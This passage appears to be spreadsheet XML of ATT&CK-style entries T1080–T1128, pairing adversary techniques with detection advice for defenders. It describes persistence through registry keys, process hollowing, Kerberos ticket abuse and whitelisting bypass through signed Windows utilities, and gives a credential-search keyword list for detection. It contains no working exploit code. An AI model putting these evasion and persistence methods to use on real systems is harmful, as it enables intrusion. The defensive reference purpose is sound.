    <t>If malware uses Standard Cryptographic Protocol, SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels.SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Packet capture,Process monitoring,Signature matching,SSL/TLS inspection</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Local port monitoring</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>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Credential Dumping. Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See Legitimate Credentials for more information.</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Example commands and utilities that obtain this information include ver, Systeminfo, and dir within cmd for identifying information based on present files and directories.</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Example utilities used to obtain this information are dir and tree.65 Custom tools may also be used to gather file and directory information and interact with the Windows API.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <t>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 Examples of events that may be subscribed to are the wall clock time or the computer's uptime. Several threat groups have reportedly used this technique to maintain persistence.</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>T1085</t>
  </si>
  <si>
    <t>The rundll32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 for normal operations.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process command-line parameters,Process monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.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 PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.Administrator permissions are required to use PowerShell to connect to remote systems.A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, and PSAttack.</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</si>
  <si>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activity.It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process command-line parameters,Process monitoring,Windows registry,PowerShell logs</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts. Example commands that can acquire this information are net user, net group &lt;groupname&gt;, and net localgroup &lt;groupname&gt; using the Net utility or through use of dsquery. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, System Owner/User Discovery may apply.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</si>
  <si>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 and PowerShell.</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring,API monitoring,PowerShell logs,Syslog monitoring</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>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</si>
  <si>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Monitor process API calls for behavior that may be indicative of DLL Injection and unusual loaded DLLs through DLL Search Order Hijacking, which indicate attempts to gain access to higher privileged processes.</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Authentication logs,Process command-line parameters,Windows registry,DLL monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>T1089</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</si>
  <si>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t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,File monitoring,Services,Windows Registry,Process command-line parameters</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Adversaries may move to additional systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into another system and executes. This may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system.</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</si>
  <si>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t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention,Local port monitoring,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>T1092</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</si>
  <si>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 Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention,Local port monitoring</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>Process hollowing occurs when a process is created in a suspended state and the process's memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different. Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Process monitoring,API monitoring,Process use of network</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of using existing Standard Application Layer Protocol to encapsulate commands. Implementations could mimic well-known protocols.</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), and transport layer protocols, such as the User Datagram Protocol (UDP). ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts;80 however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.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t>
  </si>
  <si>
    <t>Signature matching,Netflow/Enclave netflow,Packet capture,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>Data or executables may be stored in New Technology File System (NTFS) partition metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. The NTFS format has a feature called Extended Attributes (EA), which allows data to be stored as an attribute of a file or folder.</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in EA. It may be possible to monitor NTFS for writes or reads to NTFS EA or to regularly scan for the presence of modified information.</t>
  </si>
  <si>
    <t>File monitoring,Kernel drivers</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. In this technique, valid Kerberos tickets for Legitimate Credentials are captured by Credential Dumping.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 Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). Golden Tickets can be obtained for the domain using the KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.</t>
  </si>
  <si>
    <t>Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account creation and manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of creating new credentials, modifying permissions, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>Monitor for creation or modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems.Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.</t>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <t>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 to hide malware and tools.</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <t>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 Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</t>
  </si>
  <si>
    <t>Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Authentication logs,Netflow/Enclave netflow,Process command-line parameters</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>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HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. </t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe with AuditLevel = 8.</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system. Popular websites and social media can act as a mechanism for command and control and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</si>
  <si>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Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.</t>
  </si>
  <si>
    <t>Network device interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,Signature matching</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>DLLs that are specified in the AppInit_DLLs value in the Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program. This value can be abused to obtain persistence by causing a DLL to be loaded into most processes on the computer. The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs.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</si>
  <si>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Loaded DLLs,Process monitoring,Windows Registry,API monitoring</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions.Use of multiple stages may obfuscate the command and control channel to make detection more difficult.Remote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features.The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network,Anti-virus</t>
  </si>
  <si>
    <t>Command and Control,Lateral Movement</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>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FTP. Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.Analyze network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess are common and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t>
  </si>
  <si>
    <t>API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>T1107</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</si>
  <si>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 There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Defense Evasion,Persistence</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>Adversaries may use more than one remote access tool with varying command and control protocols as a hedge against detection. If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to Legitimate Credentials to use remote services such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.Use of a Web Shell is one such way to maintain access to a network through an externally accessible Web server.</t>
  </si>
  <si>
    <t>Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators. If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Binary file metadata,Authentication logs,Windows event logs,Syslog monitoring,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>T1109</t>
  </si>
  <si>
    <t>Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to Basic Input/Output System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t>
  </si>
  <si>
    <t>MBR,VBR,Kernel drivers</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Monitor authentication logs for system and application login failures on Legitimate Credentials. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification.Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. Often Legitimate Credentials are required, along with access to the remote system's Windows Admin Shares for RPC communication.</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system.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file.Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,API Monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.</t>
  </si>
  <si>
    <t>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Good with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,File monitoring,Windows event logs,Data loss prevention,Syslog monitoring</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Adversaries may target user email to collect sensitive information from a target.Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</t>
  </si>
  <si>
    <t>File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.Monitor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Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring,Process monitoring,Process use of network,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. Applications can access clipboard data by using the Windows API.</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be Good against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>API monitoring,Syslog monitoring,Windows event logs</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries. The certificates used during an operation may be created, forged, or stolen by the adversary. Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>Regsvr32 is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32 can be used to execute arbitrary binaries.Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32 for normal operations. Regsvr32.exe is also a Microsoft signed binary.Regsvr32 can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32 is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded.</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is located in the .NET directory on a Windows system: C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe.InstallUtil.exe is digitally signed by Microsoft. Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.</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</si>
  <si>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Data Staged.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Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Data loss prevention,API monitoring,PowerShell logs,Syslog monitoring</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,API monitoring,PowerShell logs,Authentication logs,Local port monitoring</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.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 An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</t>
  </si>
  <si>
    <t>There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths.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Good with a COM object Registry modification may indicate COM hijacking has been performed.</t>
  </si>
  <si>
    <t>Windows Registry,DLL monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t xml:space="preserve"> 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</si>
  <si>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microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. The information could be useful for performing other techniques, such as executing a file with a Scheduled Task, or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,API monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">T1125 </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</si>
  <si>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 due to use of specific devices or applications for video recording rather than capturing the victim's screen</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</si>
  <si>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t>
  </si>
  <si>
    <t>Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\share /delete command.67 Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of Windows Admin Shares. SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>{There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whitelisting defensive solutions.
===MSBuild===
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.MSDN MSBuild
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.MSDN MSBuild Inline Tasks
MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe
execution.SubTee GitHub All The Things Application Whitelisting Bypass
===DNX===
The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.Microsoft Migrating from DNX DNX is not present on standard builds of Windows and may
only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft.
An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX.engima0x3 DNX Bypass
===RCSI===
The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.Microsoft Roslyn
CPT RCSI The rcsi.exe binary is signed by Microsoft.engima0x3 RCSI Bypass
C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.engima0x3
RCSI Bypass
===WinDbg/CDB===
WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone
tools.Microsoft Debugging Tools for Windows They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.
An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities.</t>
  </si>
  <si>
    <t xml:space="preserve"> {The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
 Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine
 anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be
 suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.}</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.129 The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs.</t>
  </si>
  <si>
    <r>
      <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>HKLM\SOFTWARE\Microsoft\Netsh</t>
